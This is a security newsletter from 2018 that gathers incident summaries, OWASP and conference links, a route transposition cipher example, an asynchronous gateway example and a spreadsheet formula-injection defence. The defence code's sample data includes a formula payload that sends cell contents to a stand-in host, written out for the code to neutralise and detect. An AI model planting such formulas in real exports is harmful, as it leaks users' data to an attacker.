Security Stack Sheet #4

Word of the week “Cyber security own goal”

Avoid scoring a cyber security own goal this summer

Cyber security is now an important part of our lives so, if you are travelling to the FIFA™ World Cup in Russia this summer, it’s understandable that you may be thinking about how best to secure your devices and key accounts.

This blog provides some quick and easy steps to improve your personal cyber security. It should be read alongside the FCO Travel Advice and the guidance offered on the Be on the Ball: World Cup 2018 website.


“Data Re-Identification” – thanks to Dougy

Person re-identification (re-ID) has become increasingly popular in the community due to its application and research significance. It aims at spotting a person of interest in other cameras. In the early days, hand-crafted algorithms and small-scale evaluation were predominantly reported. Recent years have witnessed the emergence of large-scale datasets and deep learning systems which make use of large data volumes.

Link HERE and HERE and HERE and papers HERE and HERE and the reverse pseudonymisation HERE


Word of the week special

“Security 3 lines of defence”

The IIA and the IoD endorse the ‘Three Lines of Defence’ model as a way of explaining the relationship between an organisation’s risk, control and assurance functions, and as a guide to how responsibilities should be divided:

  • the first line of defence – functions that own and manage risk
  • the second line of defence – functions that oversee or specialise in risk management and compliance
  • the third line of defence – functions that provide independent assurance, above all internal audit

Links HERE and HERE and HERE


“Value Stream Mapping” and “Wardley (Value Chain) Mapping”

Links HERE and others HERE and HERE and HERE




Crypto Infographics



Crypto challenge of the week

-“Route” Transposition Cipher – thanks to Mark
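For readers attempting the challenge, the following is an added worked example of a route transposition cipher (it is not the challenge text, and the route names, grid width and the padding letter X are this example's own conventions): the plaintext is written into a grid row by row and the ciphertext is read out along a fixed route, so the key is just the grid width plus the route. The brute-force helper shows why the scheme is weak: the key space is so small that a single known word recovers the key.

```python
# Route transposition cipher, added example (not the newsletter's challenge).
# Plaintext is written into a grid row by row; ciphertext is read out along a
# named route.  Key = (grid width, route name).  Non-letters are dropped and
# the last row is padded with "X", both conventions chosen for this example.


def _fill_grid(text, width, pad="X"):
    """Strip non-letters, upper-case, pad to a whole number of rows."""
    letters = "".join(ch for ch in text.upper() if ch.isalpha())
    while len(letters) % width:
        letters += pad
    return [list(letters[i:i + width]) for i in range(0, len(letters), width)]


def _route(rows, cols, name):
    """Visiting order of (row, col) cells for the named route."""
    if name == "columns":          # straight down each column, left to right
        return [(r, c) for c in range(cols) for r in range(rows)]
    if name == "zigzag":           # down the first column, up the next, and so on
        order = []
        for c in range(cols):
            rs = range(rows) if c % 2 == 0 else range(rows - 1, -1, -1)
            order.extend((r, c) for r in rs)
        return order
    if name == "spiral":           # clockwise inward spiral from the top-left corner
        order, top, bottom, left, right = [], 0, rows - 1, 0, cols - 1
        while top <= bottom and left <= right:
            order.extend((top, c) for c in range(left, right + 1))
            order.extend((r, right) for r in range(top + 1, bottom + 1))
            if top < bottom:
                order.extend((bottom, c) for c in range(right - 1, left - 1, -1))
            if left < right:
                order.extend((r, left) for r in range(bottom - 1, top, -1))
            top, bottom, left, right = top + 1, bottom - 1, left + 1, right - 1
        return order
    raise ValueError("unknown route: %r" % name)


def encrypt(plaintext, width, route="spiral"):
    grid = _fill_grid(plaintext, width)
    return "".join(grid[r][c] for r, c in _route(len(grid), width, route))


def decrypt(ciphertext, width, route="spiral"):
    """Inverse: drop the letters back into the grid along the route, read rows."""
    if len(ciphertext) % width:
        raise ValueError("ciphertext length must be a multiple of the grid width")
    rows = len(ciphertext) // width
    grid = [[""] * width for _ in range(rows)]
    for ch, (r, c) in zip(ciphertext, _route(rows, width, route)):
        grid[r][c] = ch
    return "".join("".join(row) for row in grid)


def brute_force(ciphertext, crib, routes=("columns", "zigzag", "spiral")):
    """Exhaustively try every (width, route) and keep those whose decryption
    contains a known word (crib).  The key space is tiny, which is the point."""
    hits = []
    for width in range(2, len(ciphertext)):
        if len(ciphertext) % width:
            continue
        for route in routes:
            if crib in decrypt(ciphertext, width, route):
                hits.append((width, route))
    return hits


if __name__ == "__main__":
    ct = encrypt("we are discovered, flee at once", 5)
    print(ct, "->", decrypt(ct, 5), "key guesses:", brute_force(ct, "FLEE"))
```

Padding leaks the grid width whenever the last row is short, and the ciphertext length constrains the width to its divisors, so the crib search above rarely has more than a handful of candidates to test.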




May 25: GDPR Live! Waiting for first incident (and fine)!

June 12 2018: Trump met Kim


June 30: PCI DSS deadline to stop using SSL and early TLS (TLS 1.0); TLS 1.1 becomes the minimum, with TLS 1.2 or higher strongly recommended


Now: TLS1.2 mandatory for proper security

June 14: World Cup 2018 kicks off

July and August – Holidays!!

March 29 2019: Brexit

Sept 14 2019: PSD2 strong customer authentication (RTS on SCA) becomes mandatory


Comic of the week

Some OWASP stuff first

-OWASP Hackademic Challenges Project




-A developer’s guide to the GDPR – from IBM

Understand how the GDPR impacts you

This article, the first in a three-part series, summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens. Part 2 explores how to integrate privacy risk evaluation and mitigation within the software development lifecycle, and Part 3 provides practical application development techniques that can alleviate an application’s privacy risk.

Links HERE Others HERE and HERE and HERE and HERE and HERE and HERE and HERE

-Utility script to build a PDF book gathering all OWASP Cheat Sheets

Link HERE Cheat sheets HERE

-Presentations from OffensiveCON

OffensiveCon18 – Markus Vervier and Michele Orru – Oh No, Where’s FIDO?

OffensiveCon18 – Brian Gorenc, Abdul-Aziz Hariri and Jasiel Spelman – L’art de l’évasion (The Art of Evasion) – Modern VMWare Exploitation Techniques

OffensiveCon18 – Alex Ionescu – Advancing the State of UEFI Bootkits

OffensiveCon18 – Cedric Halbronn – Robin Hood vs Cisco ASA AnyConnect

OffensiveCon18 – Niko Schmidt, Marco Bartoli, Fabian Yamaguchi – Field Report on a Zero-Day Machine

OffensiveCon18 – Ilya Smith – Linux ASLR and GNU Libc

OffensiveCon18 – Rodrigo Branco – Inside the Machine – Keynote Day 1

OffensiveCon18 – Maddie Stone – The Smarts Behind Hacking Dumb Devices

OffensiveCon18 – James Forshaw – New and Improved UMCI, Same Old Bugs

OffensiveCon18 – Alex Matrosov – Betraying the BIOS: Going Deeper into BIOS Guard Implementations

OffensiveCon18 – Nick Sampanis – Windows 10 RS2/RS3 GDI Data-Only Exploitation Tales

OffensiveCon18 – Joe Bialek – The Evolution of CFI Attacks and Defenses

OffensiveCon18 – Jos Wetzels and Ali Abbasi – Dissecting QNX – Analyzing & Breaking QNX Exploit Mitigations and Secure Random Number Generators

OffensiveCon18 – Jörn Schneeweisz – Surprise Rant

OffensiveCon18 – Vitaly Nikolenko – Concolic Testing for Kernel Fuzzing and Vulnerability Discovery


-Insights from Code Conference 2018

A collection of quotes and one-liners (and apologies) from #CODECON that were interesting, insightful or thought-provoking.


-Don’t forget about



Incidents in the world last week

Other source HERE (find your country)

Fraudsters exploiting newsworthy events

Opportunistic fraudsters have been using current events and exploiting public concern for their own financial gain.

Owari botnet own-goal takeover

Security researchers recently took over the large Owari botnet after its owner failed to change the command-and-control (C&C) server’s weak default credentials.



Global ALERT level

Incidents detail

MIT researchers develop frequency-hopping transmitter that fends off attackers

Academic researchers say they have invented a transmitter that can secure billions of Internet of Things products by individually scattering each bit of data that a device wirelessly sends out onto different radio frequency channels, thus preventing attackers from intercepting a full packet and manipulating its data.


FireEye Finds New Clues in TRITON/TRISIS Attack

Researchers from FireEye have found proof that the hackers who breached and inadvertently shut down a safety monitoring system in a Middle East industrial plant reverse-engineered the protocol software.

“Instead of just being a theory that they reverse-engineered something or used legitimate resources to augment their development on it, now we have evidence that supports that,” says Steve Miller, a researcher with FireEye who made the discovery after studying the malware’s Python scripts.

The so-called TRITON/TRISIS attack targeted Schneider Electric’s emergency shutdown system – Triconex Tricon – with custom malware. Two of the plant’s safety-instrumented system (SIS) controllers entered a failed safe mode that shut down the industrial process and ultimately led to last year’s discovery of the malware.


Apple strikes blow to Facebook as it clamps down on data harvesting

Rules appear to target services like Onavo Protect, which claims to protect user data even as it feeds information to Facebook.


Pwn goal: Hackers used the username root, password root for botnet control database login


Sofacy APT Has Subtly Changed Tactics

A well-known Russian cyber-espionage group has subtly changed its modus operandi, moving to what security researchers from Palo Alto Networks are calling “parallel attacks.”


A code-signing bypass has been discovered affecting Mac OS versions going back to 2005 that let an attacker pass off malicious code as if it had been signed by Apple.

Prowli Malware Operation Infected Over 40,000 Servers, Modems, and IoT Devices


Europol forms new Dark Web Team to combat online criminal marketplaces


The InvisiMole malware allows attackers to take control of a machine and silently hear and see through the computer.

Dixons Carphone admits huge data breach affecting 5.9 million payment cards

Links HERE and HERE

Facebook bug changed 14 million users’ default privacy settings to public


Research shows 75% of ‘open’ Redis servers infected


Server-Side Spreadsheet Injection – Formula Injection to Remote Code Execution
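The article title above covers both halves of the problem: a server that writes user-controlled strings into CSV/XLSX exports hands a formula to whichever spreadsheet opens the file, and a server that itself feeds uploaded sheets to a spreadsheet engine will evaluate attacker-supplied formulas. The block below is an added example (not the article's code) of the export-side neutralisation and an import-side check; the sample rows, the `example.invalid` hostname and the trigger list are constructed for this illustration.

```python
import csv
import io

# Leading characters that spreadsheet applications treat as the start of a
# formula rather than text.  Tab and carriage return are included because some
# parsers treat them as separators that let a following "=" begin a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralise(value):
    """Export-side fix: a leading single quote makes the spreadsheet keep the
    cell as literal text.  Only strings are touched; a numeric -42 stays numeric."""
    if is_formula_like(value):
        return "'" + value
    return value


def export_csv_unsafe(rows):
    """Vulnerable pattern: user-controlled strings are written verbatim."""
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()


def export_csv_safe(rows):
    """Hardened export: neutralise formula triggers and quote every field."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    writer.writerows([[neutralise(cell) for cell in row] for row in rows])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Import-side check for a server that processes uploaded sheets: report
    every cell that a spreadsheet engine would evaluate, so it can be rejected
    or stored as text instead of being handed to the engine."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: the "name" column is attacker-controlled user input.
SAMPLE_ROWS = [
    ["name", "balance"],
    ['=HYPERLINK("http://example.invalid/?x="&A2,"open")', 100],
    ["@SUM(1,2)", -42],
    ["-42", 7],          # a string that merely looks numeric is still neutralised
    ["Alice", 3],
]

if __name__ == "__main__":
    print(export_csv_unsafe(SAMPLE_ROWS))
    print(export_csv_safe(SAMPLE_ROWS))
    print(find_formula_cells(export_csv_unsafe(SAMPLE_ROWS)))
```

Note the asymmetry the import check exposes: CSV carries no types, so on the way in a plain negative number is indistinguishable from a formula trigger. A server that ingests spreadsheets should therefore parse numbers itself and store every other cell as text, rather than trying to decide which formulas are "safe" to let an engine evaluate.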



Research of the week

-The Seven Properties of Highly Secure Devices


-Crypto papers

This webpage is an attempt to assemble a ranking of top-cited papers from the area of cryptography. The ranking has been created based on citations of papers published at top cryptography conferences. More details are available here



Tool of the week

-Finding deserialisation issues has never been easier: Freddy the serial(isation) killer


-Traefik and Docker Services

I run all my docker services ‘behind’ traefik (I do not want to have my (hundreds of) docker services directly accessible from the Internet, for security). I do not want to create and handle SSL/TLS certificates for all the docker services. Therefore I am using an SSL wildcard certificate and point it to my traefik ip address. Traefik terminates TLS/SSL and happily routes all my HTTP or HTTPS packages, based on HOST or URL pattern rules, to the designated back-end service. Furthermore, traefik is docker-aware and allows registering or unregistering docker services without restarting traefik.


-Automated twitter loot collection

Twitter is a great place to find interesting things being shared by fellow security researchers. If you search for keywords like #opendir or hxxp://, you’ll get lots of links with open directories containing shells, control panels, sources, phishing sites or malware. Secops is hard, even for people with malicious intent.



Kewl articles

The AWS Well Architected Framework in a Nutshell

What is the Framework?



Your API Gateway should be a message queue

Or why we need Digital Osmosis


Conventional API Gateways handle difficult things like routing and provide a uniform layer that allows outside applications access without them having to understand what is going on in the inside.

Conventional API Gateways operate on the request/response pattern that most of the internet is based on. But this creates the problem of having to provide a relatively quick response so that the browser doesn’t time out. This becomes unnatural if the internals of the architecture use an event based architecture to allow for cleaner decoupling or otherwise trigger longer running tasks.
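The alternative the article argues for, as an added example that is not the article's own code: the gateway accepts the request, puts it on a queue and answers at once with 202 Accepted and a job URL, so the client polls instead of holding a connection open while the backend works. The class, the `slow_report` handler and the alice/mallory principals are constructed for this illustration; the bounded queue and owner check are the two things a practitioner would want a real gateway to get right.

```python
import queue
import threading
import uuid


class AsyncGateway:
    """Accepts a request, queues it and answers immediately with 202 Accepted
    and a job URL; the backend work happens off the request path."""

    def __init__(self, handler, max_pending=100):
        self._handler = handler
        # Bounded queue: callers get back-pressure (503) instead of the
        # gateway growing without limit under a flood of requests.
        self._queue = queue.Queue(maxsize=max_pending)
        self._jobs = {}
        self._lock = threading.Lock()

    def submit(self, principal, payload):
        job_id = str(uuid.uuid4())                 # unguessable handle
        with self._lock:
            self._jobs[job_id] = {"owner": principal, "state": "queued", "result": None}
        try:
            self._queue.put_nowait((job_id, payload))
        except queue.Full:
            with self._lock:
                del self._jobs[job_id]
            return 503, {"Retry-After": "5"}, {"error": "queue full"}
        return 202, {"Location": "/jobs/" + job_id}, {"job_id": job_id}

    def poll(self, principal, job_id):
        with self._lock:
            job = self._jobs.get(job_id)
            # Same answer for unknown and foreign jobs: no oracle on job existence.
            if job is None or job["owner"] != principal:
                return 404, {}, {"error": "not found"}
            return 200, {}, {"state": job["state"], "result": job["result"]}

    def process_next(self, timeout=None):
        """Worker step: run one queued job.  Returns False if nothing was queued."""
        try:
            job_id, payload = self._queue.get(timeout=timeout)
        except queue.Empty:
            return False
        with self._lock:
            self._jobs[job_id]["state"] = "running"
        try:
            result, state = self._handler(payload), "done"
        except Exception as exc:
            # Record the failure class only; the traceback stays on the server.
            result, state = {"error": type(exc).__name__}, "failed"
        with self._lock:
            self._jobs[job_id].update(state=state, result=result)
        self._queue.task_done()
        return True

    def start_worker(self):
        thread = threading.Thread(target=self._loop, daemon=True)
        thread.start()
        return thread

    def wait_idle(self):
        self._queue.join()

    def _loop(self):
        while True:
            self.process_next()


def slow_report(payload):
    """Stand-in for a long-running backend task (constructed for this example)."""
    return {"total": sum(payload["amounts"])}


if __name__ == "__main__":
    gw = AsyncGateway(slow_report)
    gw.start_worker()
    status, headers, body = gw.submit("alice", {"amounts": [1, 2, 3]})
    print(status, headers["Location"], gw.poll("alice", body["job_id"]))
    gw.wait_idle()
    print(gw.poll("alice", body["job_id"]))
```

The job record is keyed by the submitting principal, so a valid job id alone is not enough to read another tenant's result, and an unknown id and a foreign id are indistinguishable to the caller.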



The messy, musical process behind the web’s new security standard TLS1.3



The elite Microsoft hacker team that keeps windows PCs safe

One of them jailbroke Nintendo handhelds in a former life. Another has more than one zero-day exploit to his name. A third signed on just prior to the devastating Shadow Brokers leak. These are a few of the members of the Windows red team, a group of hackers inside Microsoft who spend their days finding holes in the world’s most popular operating system. Without them, you’d be toast.

Link HERE and purple team experiences HERE


Don’t Even Think of Complying with the New NIST Cybersecurity Framework!



Trust Issues Magazine

From personal relationships to the global stage, trust is what makes humanity more than just humans—and we’re in danger of losing it

Link HERE and the lifespan of a lie HERE


And finally, Goodbye, Object Oriented Programming

I’ve been programming in Object Oriented languages for decades. The first OO language I used was C++ and then Smalltalk and finally .NET and Java.

I was gung-ho to leverage the benefits of Inheritance, Encapsulation, and Polymorphism. The Three Pillars of the Paradigm.

I was eager to gain the promise of Reuse and leverage the wisdom gained by those who came before me in this new and exciting landscape.

I couldn’t contain my excitement at the thought of mapping my real-world objects into their Classes and expected the whole world to fall neatly into place.

I couldn’t have been more wrong




AppSec Ezine

Link HERE and credits to HERE
